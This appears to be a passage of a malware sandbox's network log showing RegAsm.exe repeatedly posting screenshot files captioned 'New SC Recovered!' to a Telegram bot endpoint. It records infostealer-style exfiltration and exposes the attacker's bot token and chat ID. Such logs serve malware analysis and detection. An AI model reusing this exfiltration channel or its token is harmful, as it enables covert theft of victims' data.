                                                Data Ascii: +zQRVdNj7SmyyqY^*<ZC /@=qW#U*;dmJn7QE@V,y[5yIO ;"7%f%fL/&d+JEG/[ZZ=kw)O|5/EO}k|*qJm.*1qOW0Zy5,oB+ch
                                                2024-05-24 05:44:06 UTC | 50 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 62 61 31 61 35 30 66 36 65 31 38 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcaba1a50f6e18--
                                                2024-05-24 05:44:07 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:07 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.2.7 | 49717 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:44:09 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcae7fd2a8c765
                                                Host: api.telegram.org
                                                Content-Length: 67229
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:10 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-24 05:44:10 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 65 37 66 64 32 61 38 63 37 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 65 37 66 64 32 61 38 63 37 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 37 2f 32 30 32 34 20 32 30 3a 35 35 3a 31 38 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcae7fd2a8c765Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcae7fd2a8c765Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/27/2024 20:55:18User
                                                2024-05-24 05:44:10 UTC | 16355 | OUT | Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:10 UTC | 16355 | OUT | Data Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:10 UTC | 16355 | OUT | Data Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:44:10 UTC | 15447 | OUT | Data Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:44:10 UTC | 1643 | OUT | Data Raw: 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 02 7f f8 f7 93 fd d3 fc ab e7 9a fa 0e 69 a2 30 48 04 88 49 53 fc 43 d2 be 7c ab 89 9c c2 b7 34 cf 12 4f 67 63 f6 0b 9b 58 2f ec f3 b9 61 b8
                                                Data Ascii: >(B>(B>(B>(B>(B>(B>(B>(B>(B>(B>i0HISC|4OgcX/a
                                                2024-05-24 05:44:10 UTC | 50 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 65 37 66 64 32 61 38 63 37 36 35 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcae7fd2a8c765--
                                                2024-05-24 05:44:10 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:10 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                12 | 192.168.2.7 | 49718 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:44:15 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcb1ecef588748
                                                Host: api.telegram.org
                                                Content-Length: 67317
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:15 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 31 65 63 65 66 35 38 38 37 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 31 65 63 65 66 35 38 38 37 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 30 31 2f 32 30 32 34 20 30 35 3a 31 33 3a 35 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcb1ecef588748Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcb1ecef588748Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/01/2024 05:13:55User
                                                2024-05-24 05:44:15 UTC | 16355 | OUT | Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:15 UTC | 16355 | OUT | Data Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:15 UTC | 16355 | OUT | Data Raw: 44 7e ad f9 51 f6 98 fd 5b f2 a2 c0 4d 45 41 f6 98 fd 5b f2 a3 ed 31 ff 00 b5 f9 51 60 27 a2 a0 fb 4c 5e ad f9 51 f6 98 bd 5b f2 a2 cc 09 e8 cd 41 f6 98 bf da fc a8 fb 54 5e ad f9 53 b0 c9 e8 a8 3e d5 17 fb 5f 95 1f 6a 8b fd af ca 8b 01 33 ff 00 c7 bc df ee 7f 51 55 6c ff 00 d6 9f a5 39 ee 90 c4 ea b9 cb 0c 72 2a 1b 79 56 27 25 b3 8c 50 93 b3 15 8b d4 b5 07 da a2 f5 6f ca 8f b5 45 ea 7f 2a 2c 32 6a 5a 83 ed 50 fa b7 e5 47 da a1 f5 3f 95 01 62 7a 4a 87 ed 70 fa 9f ca 8f b5 c3 ea 7f 2a 2c 16 27 a2 a0 fb 54 3f de 6f ca 8f b5 43 ea df 95 16 02 7a 2a 0f b5 c3 ea df 95 1f 6b 87 d5 bf 2a 2c c2 c4 f4 54 1f 6b 83 d5 bf 2a 3e d7 07 f7 9b f2 a5 66 16 27 a2 a0 fb 5c 1f de 6f ca 8f b5 c1 fd e6 fc a8 b3 0b 13 d2 d4 1f 6b b7 fe f3 7e 54 7d ae 0e ee df 95 16 63 b1 35 2d
                                                Data Ascii: D~Q[MEA[1Q`'L^Q[AT^S>_j3QUl9r*yV'%PoE*,2jZPG?bzJp*,'T?oCz*k*,Tk*>f'\ok~T}c5-
                                                2024-05-24 05:44:15 UTC | 15447 | OUT | Data Raw: 52 51 45 00 14 51 45 03 12 8a 28 a0 02 8a 29 28 00 a2 8a 28 18 51 45 14 00 94 51 45 03 0a 4a 28 a6 01 45 14 94 0c 28 a2 8a 00 29 29 69 33 40 c2 8a 4c 9a 4a 02 c2 e4 52 66 8a 4a 06 14 94 b4 94 0c 29 29 68 a0 62 51 45 14 00 51 45 25 03 0a 4a 5a 4a 00 28 a2 8a 06 25 14 51 40 09 45 14 50 30 a4 a0 d1 40 c2 92 96 92 80 0a 4a 28 a0 61 49 45 14 0c 29 29 69 0d 00 14 94 b4 94 0c 28 a2 92 81 85 25 2d 06 80 12 8a 28 a0 62 51 45 14 00 52 51 45 03 12 8a 28 a6 30 a2 8a 3a 52 01 28 a3 de 8a 06 25 14 b4 94 00 52 7e 14 b4 94 0c 28 a2 92 98 c2 8c 51 45 20 0a 4a 5a 4a 06 14 9e f4 bc d2 53 00 eb 47 3e 94 51 48 62 51 4b 49 f8 53 00 a4 fa 52 fd 28 a0 67 53 45 14 54 1e 08 51 56 f4 eb 23 7d 3b 44 1f 61 54 dd 9c 67 3c 8f f1 ab 9f d8 84 1c 1b 8c 1f f7 3f fa f5 c9 5b 1b 42 84 b9 6a
                                                Data Ascii: RQEQE()((QEQEJ(E())i3@LJRfJ))hbQEQE%JZJ(%Q@EP0@J(aIE))i(%-(bQERQE(0:R(%R~(QE JZJSG>QHbQKISR(gSETQV#};DaTg<?[Bj
                                                2024-05-24 05:44:15 UTC | 1731 | OUT | Data Raw: 43 a3 89 48 01 8a 48 c9 bc 0e 9b 80 20 37 e3 9a 9f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 89 ac 2d 5a 16 88 c5 94 69 7c e2 37 1f bf bb 76 7a fa 8a b3 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51
                                                Data Ascii: CHH 7z(}-Zi|7vzQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQ
                                                2024-05-24 05:44:15 UTC | 50 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 31 65 63 65 66 35 38 38 37 34 38 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcb1ecef588748--
                                                2024-05-24 05:44:15 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-24 05:44:15 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:15 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                13 | 192.168.2.7 | 49719 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:44:24 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcb6c88add5f77
                                                Host: api.telegram.org
                                                Content-Length: 66754
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:24 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-24 05:44:24 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 36 63 38 38 61 64 64 35 66 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 36 63 38 38 61 64 64 35 66 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 30 37 2f 32 30 32 34 20 30 39 3a 35 36 3a 30 31 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcb6c88add5f77Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcb6c88add5f77Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/07/2024 09:56:01User
                                                2024-05-24 05:44:24 UTC | 16355 | OUT | Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:24 UTC | 16355 | OUT | Data Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:24 UTC | 16355 | OUT | Data Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
